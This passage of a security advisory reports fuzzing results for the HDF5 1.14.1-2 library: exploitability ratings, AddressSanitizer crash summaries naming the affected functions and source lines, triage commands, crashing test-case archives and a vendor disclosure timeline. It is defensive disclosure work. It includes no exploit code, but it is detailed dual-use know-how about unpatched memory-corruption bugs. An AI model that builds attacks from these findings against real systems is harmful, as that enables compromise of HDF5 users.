9f693cf32c7521f6048dd450c560dc4b |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
afe7ee16699107ba82ee3a4b9ac6863b |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
b7aa443ffb1b48ed5f78502053a88176 |
PROBABLY_EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control write address and/or value. However, it there is a chance it could be a NULL dereference. |
b95ca3be3e622a4fc840451d5119aae9 |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
bdfc1a84cf389b9fe270ab25ab4cb99f |
EXPLOITABLE |
The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable. |
c2a3c435c5a299bac397e5d643bd4c13 |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
d550d85ebcaec2936d45249ad2fd96bf |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
e3829772c021a3085bea31367c30018d |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
e7dc3fc21e85273a4871a6f1625e40d1 |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
f73304be7d3e45624d4f6651c0688b35 |
EXPLOITABLE |
The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable. |
f93c69013478b5b9eab33f7412e947d1 |
EXPLOITABLE |
GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior’s process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable. |
f9b9a711564f1b8d07be3ce4c243d78b |
EXPLOITABLE |
The target crashed on a branch instruction, which may indicate that the control flow is tainted. |
fafd175667c03a4fe3963e3cfd403b4b |
PROBABLY_EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control write address and/or value. However, it there is a chance it could be a NULL dereference. |
30 of the above 35 crashes were reproducible under address sanitizer. The following table summarises the address sanitizer output:
| Filename | Summary | ASAN Summary |
|---|---|---|
07d6b324b8474a569ce13b34d919e125 |
SEGV caused by a READ memory access. in H5T__conv_i_i /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3964 |
SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3964 in H5T__conv_i_i |
0c9d1718599c629f6ae2dc253e9f556c |
READ of size 553779201 in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2592 |
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove |
0e71c9cac751ed2550aee102e2956181 |
WRITE of size 64 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394 |
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset |
0e847373645d83c271065efc23814701 |
SEGV caused by a READ memory access in H5T__conv_struct /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2318 |
SUMMARY: AddressSanitizer: SEGV ../../../../src/libsanitizer/sanitizer_common/sanitizer_libc.cpp:64 in __sanitizer::internal_memmove(void*, void const*, unsigned long) |
11049a56a4235093e6845a27021af15e |
READ of size 35329 in H5T__conv_struct /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2314 |
SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove |
161b33e54715856dee6cc2036046d00b |
SEGV signal caused by a READ memory access in H5T__bit_copy /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tbit.c:72 |
SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tbit.c:72 in H5T__bit_copy |
21fcde769605d7419d5ddd86bcb2c0ab |
READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 |
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f |
2b99439e944dd50e495b73506a80c7cb |
No crash under address sanitizer | |
2c39afc2cd6c7e4a43a6133681d1284f |
READ of size 9437208 in H5T__conv_array /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3586 |
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove |
2ca00f445e035ee71f6efb7a0ed388dc |
READ of size 524296 in H5VM_memcpyvv /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5VM.c:1535 |
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy |
38344f8077c3bdcc40d4c88cf1b67086 |
READ of size 3276850 in H5T__conv_array /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3586 |
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove |
4030f62b172d41bffcaea19c3563f2d6 |
READ memory access in H5T__conv_struct /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2318 |
SUMMARY: AddressSanitizer: SEGV ../../../../src/libsanitizer/sanitizer_common/sanitizer_libc.cpp:64 in __sanitizer::internal_memmove(void*, void const*, unsigned long) |
47a6f97d7f311db2fd03345389950c1b |
READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 |
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f |
56351b62615dd0aee14cfff22670150b |
READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4429 |
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4429 in H5T__conv_f_f |
56707228c5602b4f9032e5c5076ae951 |
No crash under address sanitizer | |
6ad05b7df38db254d21dfc55bf055948 |
Stack overflow caused by an infinite loop and stack exhaustion. |
SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset |
6e4dd98178befb28af8863cacbc07093 |
SEGV caused by a READ memory access in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4429 |
SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4429 in H5T__conv_f_f |
6ff8b28467a0e30bbf353bf6621ed9d2 |
No crash under address sanitizer | |
77d3cad25d20e9298344223c8d2d0eaa |
READ of size 407088 in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2599 |
SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove |
77e001f1dec920766158e041f2367b10 |
READ of size 1 in H5T__bit_find /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tbit.c:440 |
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tbit.c:440 in H5T__bit_find |
95a688f817a2661a035eafbfa5bdb1ce |
No crash under address sanitizer | |
9823d45c52507c162d4aff86ea0e1960 |
READ of size 2097176 in H5T__conv_array /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3586 |
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove |
9f693cf32c7521f6048dd450c560dc4b |
READ of size 8 in H5G_name_free /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Gname.c:565 |
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Gname.c:565 in H5G_name_free |
afe7ee16699107ba82ee3a4b9ac6863b |
READ of size 25728 in H5T__conv_array /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3586 |
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove |
b7aa443ffb1b48ed5f78502053a88176 |
READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 |
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f |
b95ca3be3e622a4fc840451d5119aae9 |
READ of size 1441793 in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2592 |
SUMMARY: AddressSanitizer: unknown-crash ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove |
bdfc1a84cf389b9fe270ab25ab4cb99f |
WRITE of size 64 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394 |
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset |
c2a3c435c5a299bac397e5d643bd4c13 |
SEGV caused by a READ memory access in H5T__conv_struct /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2318 |
SUMMARY: AddressSanitizer: SEGV ../../../../src/libsanitizer/sanitizer_common/sanitizer_libc.cpp:64 in __sanitizer::internal_memmove(void*, void const*, unsigned long) |
d550d85ebcaec2936d45249ad2fd96bf |
SEGV caused by a READ memory access in H5T__conv_i_i /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3964 |
SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3964 in H5T__conv_i_i |
e3829772c021a3085bea31367c30018d |
READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 |
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f |
e7dc3fc21e85273a4871a6f1625e40d1 |
SEGV signal caused by a READ memory access in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 |
SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f |
f73304be7d3e45624d4f6651c0688b35 |
READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 |
SUMMARY: AddressSanitizer: heap-use-after-free /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f |
f93c69013478b5b9eab33f7412e947d1 |
Stack overflow caused by an infinite loop and stack exhaustion |
SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_format.inc:490 in printf_common |
f9b9a711564f1b8d07be3ce4c243d78b |
Stack overflow caused by an infinite loop and stack exhaustion |
SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/asan/asan_allocator.cpp:361 in __asan::Allocator::ComputeRZLog(unsigned long) |
fafd175667c03a4fe3963e3cfd403b4b |
No crash under address sanitizer |
Compilation and Running
The fuzzed library was compiled from hdf5-1.14.1-2.tar.bz2 on Debian 11 using GCC10 and the following commands:
export CFLAGS='-g -fno-omit-frame-pointer -fsanitize=address'
export CXXFLAGS='-g -fno-omit-frame-pointer -fsanitize=address'
./configure
make -j8
make install
The resulting ./hdf5/bin/h5stat utility was used to triage the crashes found by AFL++, as follows:
$ ./hdf5/bin/h5stat /home/doi/src/crashmin/4512b0fa12719efa790f5aac035f3e71
Filename: /home/doi/src/crashmin/4512b0fa12719efa790f5aac035f3e71
=================================================================
==207016==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000004d00
at pc 0x7fd075cbf269 bp 0x7ffe2ab5ea50 sp 0x7ffe2ab5e200
WRITE of size 64 at 0x602000004d00 thread T0
#0 0x7fd075cbf268 in __interceptor_memset
../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778
#1 0x7fd0759287f2 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394
... omitted for brevity....
==207016==ABORTING
The ./hdf5/bin/h5dump utility was used to triage the h5dump crashes, as follows:
$ ./hdf5/bin/h5dump /home/doi/src/dumpcrashmin/77d3cad25d20e9298344223c8d2d0eaa
HDF5 "exploitable/77d3cad25d20e9298344223c8d2d0eaa" {
GROUP "/" {
DATASET "ArrayOfStructures" {
DATATYPE H5T_COMPOUND {
H5T_STD_I32LE "a_name";
H5T_IEEE_F32LE "m_name";
64-bit little-endian floating-point 64-bit precision "c_name";
H5T_COMPOUND {
H5T_STRING {
STRSIZE 1;
STRPAD H5T_STR_NULLTERM;
CSET H5T_CSET_ASCII;
CTYPE H5T_C_S1;
} "char_name";
H5T_ARRAY { [33924] 96-bit little-endian floating-point 32-bit
precision } "array_name";
} "d_name";
}
DATASPACE SIMPLE { ( 254 ) / ( 254 ) }
=================================================================
==1132782==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f89d7f5081c
at pc 0x7f89de579541 bp 0x7fff18ac0ae0 sp 0x7fff18ac0290
READ of size 407088 at 0x7f89d7f5081c thread T0
#0 0x7f89de579540 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
#1 0x7f89de0d3bef in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2599
#2 0x7f89de09f8ea in H5T_convert /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#3 0x7f89de0d41e1 in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2586
#4 0x7f89de09f8ea in H5T_convert /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
Crashing Testcases and Input Corpora
| File | Description |
|---|---|
| h5stat-crashes-minimized.tar.gz | The 15 crashing test cases for h5stat |
| h5stat-input-corpus.tar.gz | A coverage-based minimised input corpus consolidating the 1,000,000,000 test cases executed during the fuzzing run - Includes 1433 files |
| h5dump-crashes-minimized.tar.gz | The 89 crashing test cases for h5dump |
Recommendations
The number and potential severity of the memory corruption vulnerabilities increases the likelihood of compromise when using HDF5 to parse untrusted user data. As fixes are not available for these issues, a system which processes potentially untrusted HDF5 input should implement compensating controls such as sandboxing of the parsing process, file and input validation, and additional authentication and authorisation controls to minimise the likelihood of a real attacker exploiting these vulnerabilities.
Timeline
19/06/2023 - Initial contact with HDFGroup help desk - help desk request creation of GitHub issues - Pulse Security response explaining security issues will become public immediately once Issues are created
20/06/2023 - Request for update - HDFGroup advise technical staff will be in touch to accept technical details
28/06/2023 - Request for update
29/06/2023 - Contact from HDFGroup technical staff, request for advisory details and trial of new GitHub security issues.
30/06/2023 - Advisory details sent to HDFGroup technical staff
12/07/2023 - Request for update and advisory acknowledgement
17/07/2023 - Advisory confirmed by HDFGroup technical staff
25/07/2023 - Trial GitHub security issues created on https://github.com/HDFGroup/hdf5/
18/08/2023 - Request for update
13/09/2023 - Request for update
17/09/2023 - HDFGroup technical staff advise other aspects of the project have taken priority over addressing memory corruption vulnerabilities found through this fuzzing process
20/09/2023 - Advisory release